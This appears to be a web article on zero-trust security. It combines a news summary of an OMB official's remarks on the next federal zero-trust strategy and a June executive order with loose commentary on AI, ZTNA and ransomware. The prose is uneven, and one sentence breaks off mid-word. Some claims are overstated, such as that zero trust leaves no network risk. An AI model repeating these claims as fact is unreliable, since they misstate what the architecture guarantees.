The zero-trust security architecture was introduced by Forrester Research in 2010. Zero trust is a cybersecurity paradigm focused on resource protection and the premise that trust is never granted implicitly but must be continually evaluated.

Nick Polk, branch director for federal cybersecurity at the Office of Management and Budget, said OMB is looking toward the next iteration of the federal zero trust strategy.

“We’re still coalescing around the exact strategy here, but it likely will be focused on specific initiatives we can undertake for the entire government,” Polk said a July 16 online meeting of the Information Security and Privacy Advisory Board.

AI & Zero Trust

AI tools help build a Zero Trust foundation for enterprises fixing different layers of security and focus on elevating security strategies . Now with the advent of AI-driven advancements, the path forward offers some intriguing prospects for AI and zero trust synergies.

AI and Zero Trust intersecting will unlock key opportunities for holistic cyber security maturity, further AI generates an informed narrative for granting or denying resource access. The security approach seamlessly aligns with a core tenet on principle of Zero Trust and least privilege.

Key Security Updates

Nick Polk also explained some of the key changes in President Donald Trump’s June cybersecurity executive order. Trump maintained many Biden-era initiatives, but canceled a plan to require federal software vendors to submit “artifacts” that demonstrate the security of their product.

“That was really a key instance of compliance over security, requiring an excessive amount of different artifacts from each software vendor, changing requirements midstream, when software providers were already working on getting the security software development form and agencies were already working on collecting it,” Polk said, pointing to a continued requirement for agencies to collect secure software attestation forms from contractors.

How Zero trust help organizations security posture

Organizations who place Zero Trust architecture will have access control policies and definitely use micro segmentation . Required to minimize the damage from ransomware attack can cause.

Attackers not only find it more difficult to breach the system in the first place, they’re limited in their ability to expand made possible by Zero trust when put in place.

Ransomware attack, typically involves an initial infection, lateral movement and data exfiltration with or without encryption. Zero Trust implementation bring organization to address each step as it happens or before it happens. Ransomware will attack a business, consumer, or device e

According to Gartner, at least 70% of new remote access deployments will be served mainly by ZTNA instead of VPN services by 2025 — up from less than 10% at the end of 2021.

Zero trust is based on the principle of least-privilege access, meaning it has to be assumed that no user or application should be inherently trusted. Zero Trust Network Access (ZTNA) takes a completely different approach than VPNs to securing access for remote workers.

Implementing zero trust will connect users to network and no risk is involved with network. Users are connected directly to only the applications and data they need, preventing the lateral movement of malicious users with overly permissive access to sensitive data and resources.

Behavioral Analytics and Anomaly Detection with AI its much easier to detect and entity actions

Automating Threat Response and Remediation is faster with AI as, AI takes the lead in automating response measures by swift device isolation.

AI involves real time risk assessments and determines when to give access resource.

In few years from now many organization will attain the optimal posture for Zero Trust as AI and zero trust emerge as strong significant partner for a better security maturity and posture.

(Source: https://www.computer.org/csdl/magazine/co/2022/02/09714079/1AZLiSNNvIk)

Source: https://www.govcon.community/c/news-summary/trump-admin-focuses-on-zero-trust-2-0-cybersecurity-efficiencies

Scroll to top